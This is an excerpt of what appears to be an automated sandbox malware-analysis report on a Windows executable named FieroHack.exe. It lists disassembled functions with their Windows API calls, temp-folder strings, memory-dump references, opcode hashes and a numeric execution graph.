                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: ItemTextlstrlenwsprintf
                                                    • String ID: %u.%u%s%s
                                                    • API String ID: 3540041739-3551169577
                                                    • Opcode ID: a1c755fdd4d8c4595d0eeac3b8ec17e8d877cccc6c1b0446fe9a747102dae0da
                                                    • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                    • Opcode Fuzzy Hash: a1c755fdd4d8c4595d0eeac3b8ec17e8d877cccc6c1b0446fe9a747102dae0da
                                                    • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                    Function 00405A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrcatlstrlen
                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 2659869361-3081826266
                                                    • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                    • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                    • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                    • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                    Function 0040209D Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,004257BA,74DF23A0), ref: 0040527A
                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                    • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                    • String ID:
                                                    • API String ID: 2987980305-0
                                                    • Opcode ID: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                    • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                    • Opcode Fuzzy Hash: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                    • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                    Function 00402E3D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                                                    • GetTickCount.KERNEL32 ref: 00402E6E
                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                    • String ID:
                                                    • API String ID: 2102729457-0
                                                    • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                    • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                    • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                    • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                    Function 00405B7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,0042EC20,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                      • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                    • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                    • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 3248276644-3081826266
                                                    • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                    • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                    • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                    • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                    Function 00405192 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 004051C1
                                                    • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                      • Part of subcall function 004041C7: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 004041D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Window$CallMessageProcSendVisible
                                                    • String ID:
                                                    • API String ID: 3748168415-3916222277
                                                    • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                    • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                    • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                    • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                    Function 00403875 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,74DF3410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                    • GlobalFree.KERNEL32(?), ref: 00403896
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Free$GlobalLibrary
                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                    • API String ID: 1100898210-3081826266
                                                    • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                    • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                    • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                    • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                    Function 00405AD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FieroHack.exe,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405ADC
                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FieroHack.exe,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405AEA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrlen
                                                    • String ID: C:\Users\user\Desktop
                                                    • API String ID: 2709904686-224404859
                                                    • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                    • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                    • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                    • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                    Function 00405BF5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C1D
                                                    • CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                    • String ID:
                                                    • API String ID: 190613189-0
                                                    • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                    • Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
                                                    • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                    • Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

                                                    Execution Graph

                                                    Execution Coverage:15.1%
                                                    Dynamic/Decrypted Code Coverage:99.2%
                                                    Signature Coverage:2.3%
                                                    Total number of Nodes:513
                                                    Total number of Limit Nodes:34
                                                    execution_graph 47999 5e1aa60 48000 5e1aa99 47999->48000 48004 5e157e8 48000->48004 48010 5e157d8 48000->48010 48001 5e1aac4 48005 5e157e9 48004->48005 48006 5e15851 48005->48006 48016 539600c 48005->48016 48023 539abf2 48005->48023 48029 5396001 48005->48029 48006->48001 48011 5e157dc 48010->48011 48012 5e15851 48011->48012 48013 539600c 3 API calls 48011->48013 48014 5396001 3 API calls 48011->48014 48015 539abf2 3 API calls 48011->48015 48012->48001 48013->48012 48014->48012 48015->48012 48017 5396017 48016->48017 48018 539acec 48017->48018 48019 539ac42 48017->48019 48036 5395ee4 48018->48036 48021 539ac9a CallWindowProcW 48019->48021 48022 539ac49 48019->48022 48021->48022 48022->48006 48024 539acec 48023->48024 48025 539ac42 48023->48025 48026 5395ee4 2 API calls 48024->48026 48027 539ac9a CallWindowProcW 48025->48027 48028 539ac49 48025->48028 48026->48028 48027->48028 48028->48006 48030 5396017 48029->48030 48031 539acec 48030->48031 48032 539ac42 48030->48032 48033 5395ee4 2 API calls 48031->48033 48034 539ac9a CallWindowProcW 48032->48034 48035 539ac49 48032->48035 48033->48035 48034->48035 48035->48006 48037 5395eef 48036->48037 48038 53995b9 48037->48038 48040 53995a9 48037->48040 48039 539600c 3 API calls 48038->48039 48041 53995b7 48038->48041 48039->48041 48045 53997ac 48040->48045 48051 53996d0 48040->48051 48056 53996e0 48040->48056 48046 539976a 48045->48046 48047 53997ba 48045->48047 48061 5399789 48046->48061 48069 5399798 48046->48069 48048 5399780 48048->48041 48053 53996f4 48051->48053 48052 5399780 48052->48041 48054 5399789 3 API calls 48053->48054 48055 5399798 3 API calls 48053->48055 48054->48052 48055->48052 48058 53996f4 48056->48058 48057 5399780 48057->48041 48059 5399789 3 API calls 48058->48059 48060 5399798 3 API calls 48058->48060 48059->48057 48060->48057 48062 5399798 48061->48062 48063 53997a9 48062->48063 48076 5e15167 48062->48076 48096 5e1a478 48062->48096 48101 5e1a488 48062->48101 48107 5e15178 48062->48107 48127 539abd0 48062->48127 48063->48048 48070 53997a9 48069->48070 48071 5e15167 3 API calls 48069->48071 48072 539abd0 3 API calls 48069->48072 48073 5e15178 3 API calls 48069->48073 48074 5e1a488 3 API calls 48069->48074 48075 5e1a478 3 API calls 48069->48075 48070->48048 48071->48070 48072->48070 48073->48070 48074->48070 48075->48070 48077 5e1516c 48076->48077 48078 5e151ad 48077->48078 48079 5e15196 48077->48079 48080 5e151d8 48077->48080 48092 5e152de 48078->48092 48142 5e15747 48078->48142 48147 5e15748 48078->48147 48152 5e15739 48078->48152 48081 5e151b2 48079->48081 48082 5e1519b 48079->48082 48080->48078 48083 5e15464 48080->48083 48081->48078 48089 5e1542c 48081->48089 48081->48092 48084 5e153c2 48082->48084 48085 5e151a4 48082->48085 48138 5e14958 48083->48138 48130 5e148a8 48084->48130 48085->48078 48088 5e1543a 48085->48088 48157 5e14928 CallWindowProcW CallWindowProcW CallWindowProcW 48088->48157 48134 5e14918 48089->48134 48092->48063 48097 5e1a47b 48096->48097 48098 5e1a45b 48096->48098 48097->48098 48180 5e1a4e0 48097->48180 48186 5e1a4f0 48097->48186 48098->48063 48102 5e1a496 48101->48102 48103 5e1a4c8 48101->48103 48104 5e1a49d 48102->48104 48105 5e1a4e0 3 API calls 48102->48105 48106 5e1a4f0 3 API calls 48102->48106 48103->48063 48104->48063 48105->48104 48106->48104 48108 5e15179 48107->48108 48109 5e15196 48108->48109 48110 5e151d8 48108->48110 48116 5e151ad 48108->48116 48111 5e151b2 48109->48111 48112 5e1519b 48109->48112 48113 5e15464 48110->48113 48110->48116 48111->48116 48120 5e1542c 48111->48120 48123 5e152de 48111->48123 48114 5e153c2 48112->48114 48115 5e151a4 48112->48115 48118 5e14958 3 API calls 48113->48118 48117 5e148a8 3 API calls 48114->48117 48115->48116 48119 5e1543a 48115->48119 48116->48123 48124 5e15747 3 API calls 48116->48124 48125 5e15739 3 API calls 48116->48125 48126 5e15748 3 API calls 48116->48126 48117->48123 48118->48123 48192 5e14928 CallWindowProcW CallWindowProcW CallWindowProcW 48119->48192 48122 5e14918 3 API calls 48120->48122 48122->48123 48123->48063 48124->48123 48125->48123 48126->48123 48128 539600c 3 API calls 48127->48128 48129 539abea 48128->48129 48129->48063 48131 5e148b3 48130->48131 48132 5e15748 3 API calls 48131->48132 48133 5e1595e 48132->48133 48133->48092 48135 5e14923 48134->48135 48136 5e15748 3 API calls 48135->48136 48137 5e1b724 48136->48137 48137->48092 48139 5e14963 48138->48139 48140 5e15748 3 API calls 48139->48140 48141 5e169f1 48140->48141 48141->48092 48143 5e15749 48142->48143 48144 5e15753 48143->48144 48158 5e15768 48143->48158 48144->48092 48145 5e15760 48145->48092 48148 5e15749 48147->48148 48149 5e15753 48148->48149 48151 5e15768 3 API calls 48148->48151 48149->48092 48150 5e15760 48150->48092 48151->48150 48153 5e1573c 48152->48153 48153->48092 48154 5e15753 48153->48154 48156 5e15768 3 API calls 48153->48156 48154->48092 48155 5e15760 48155->48092 48156->48155 48157->48092 48159 5e1576c 48158->48159 48160 5e15794 48159->48160 48164 5399fb8 48159->48164 48169 5399fc8 48159->48169 48174 539aaef 48159->48174 48160->48145 48166 539a014 48164->48166 48165 539a065 48165->48160 48166->48165 48167 5e157e8 3 API calls 48166->48167 48168 5e157d8 3 API calls 48166->48168 48167->48165 48168->48165 48170 539a014 48169->48170 48171 539a065 48170->48171 48172 5e157e8 3 API calls 48170->48172 48173 5e157d8 3 API calls 48170->48173 48171->48160 48171->48171 48172->48171 48173->48171 48175 539aa9e 48174->48175 48176 539aaf6 48174->48176 48178 5e157e8 3 API calls 48175->48178 48179 5e157d8 3 API calls 48175->48179 48177 539aaa1 48177->48160 48178->48177 48179->48177 48181 5e1a4e5 48180->48181 48182 5e1a4c7 48181->48182 48183 5399fb8 3 API calls 48181->48183 48184 5399fc8 3 API calls 48181->48184 48185 539abd0 3 API calls 48181->48185 48182->48098 48183->48182 48184->48182 48185->48182 48187 5e1a54b 48186->48187 48188 5e1a516 48186->48188 48187->48188 48189 5399fb8 3 API calls 48187->48189 48190 5399fc8 3 API calls 48187->48190 48191 539abd0 3 API calls 48187->48191 48188->48098 48189->48188 48190->48188 48191->48188 48192->48123 48193 5e1a340 48194 5e1a399 GetClassInfoW 48193->48194 48196 5e1a42a 48194->48196 48612 53989de 48613 53989e7 48612->48613 48614 5398b36 48613->48614 48615 5398788 SetWindowLongW 48613->48615 48615->48614 48197 5e198c8 48198 5e198b3 48197->48198 48200 5e19877 48198->48200 48203 5398788 48198->48203 48206 5398781 48198->48206 48199 5e198c2 48210 5395ef4 48203->48210 48207 5398788 48206->48207 48208 5395ef4 SetWindowLongW 48207->48208 48209 53987a0 48208->48209 48209->48199 48211 53987b8 SetWindowLongW 48210->48211 48212 53987a0 48211->48212 48212->48199 48213 5e1b3c8 48214 5e1b3ef 48213->48214 48215 5e1b450 48214->48215 48218 539641f 48214->48218 48221 5393e44 48214->48221 48225 5395d2c 48218->48225 48220 5396447 48220->48215 48222 5393e4f 48221->48222 48223 5396447 48222->48223 48224 5395d2c 6 API calls 48222->48224 48223->48215 48224->48223 48227 5395d37 48225->48227 48226 53965f0 48226->48220 48227->48226 48229 539651a 48227->48229 48235 5396618 48227->48235 48243 5396600 48227->48243 48228 53965b9 48251 5e1b728 48228->48251 48256 5e1b738 48228->48256 48229->48228 48230 5395d2c 6 API calls 48229->48230 48230->48229 48237 5396649 48235->48237 48238 5396756 48235->48238 48236 5396655 48236->48229 48237->48236 48261 53974f0 48237->48261 48266 53974e2 48237->48266 48238->48229 48245 5396649 48243->48245 48248 5396756 48243->48248 48244 5396655 48244->48229 48245->48244 48249 53974f0 CreateWindowExW 48245->48249 48250 53974e2 CreateWindowExW 48245->48250 48246 5396749 48282 5395d5c CreateWindowExW PostMessageW SendMessageW SendMessageW 48246->48282 48248->48229 48249->48246 48250->48246 48253 5e1b74a 48251->48253 48252 5e1b787 48252->48226 48253->48252 48283 5e1b940 48253->48283 48287 5e1b92f 48253->48287 48257 5e1b74a 48256->48257 48258 5e1b787 48257->48258 48259 5e1b940 2 API calls 48257->48259 48260 5e1b92f 2 API calls 48257->48260 48258->48226 48259->48258 48260->48258 48262 539751b 48261->48262 48263 53975ca 48262->48263 48271 5398411 48262->48271 48275 5398440 48262->48275 48267 539751b 48266->48267 48268 53975ca 48267->48268 48269 5398411 CreateWindowExW 48267->48269 48270 5398440 CreateWindowExW 48267->48270 48268->48268 48269->48268 48270->48268 48272 5398440 48271->48272 48278 5395eb8 48272->48278 48276 5395eb8 CreateWindowExW 48275->48276 48277 5398475 48276->48277 48277->48263 48279 5398490 CreateWindowExW 48278->48279 48281 5398666 48279->48281 48282->48248 48284 5e1b944 48283->48284 48285 5e1ba98 48284->48285 48291 5e1bea9 48284->48291 48285->48252 48288 5e1b940 48287->48288 48289 5e1ba98 48288->48289 48290 5e1bea9 2 API calls 48288->48290 48289->48252 48290->48289 48292 5e1beaf 48291->48292 48295 5e1bf81 48291->48295 48300 5e1bf90 48291->48300 48296 5e1bfb2 48295->48296 48305 5e1c892 48296->48305 48311 5e1c89e 48296->48311 48297 5e1bffb 48297->48292 48301 5e1bfb2 48300->48301 48303 5e1c892 2 API calls 48301->48303 48304 5e1c89e 2 API calls 48301->48304 48302 5e1bffb 48302->48292 48303->48302 48304->48302 48306 5e1c8b0 48305->48306 48307 5e1c8b6 48305->48307 48306->48297 48316 76d9a28 48307->48316 48320 76d9a30 48307->48320 48308 5e1c920 48308->48297 48312 5e1c8af 48311->48312 48314 76d9a28 GetConsoleWindow 48312->48314 48315 76d9a30 GetConsoleWindow 48312->48315 48313 5e1c920 48313->48297 48314->48313 48315->48313 48317 76d9a2c GetConsoleWindow 48316->48317 48319 76d9ab2 48317->48319 48319->48308 48321 76d9a31 GetConsoleWindow 48320->48321 48323 76d9ab2 48321->48323 48323->48308 48392 539ad68 48393 539ad78 48392->48393 48398 539c79c 48393->48398 48404 5e16418 48393->48404 48411 5e16428 48393->48411 48394 539ada1 48399 539c7a5 48398->48399 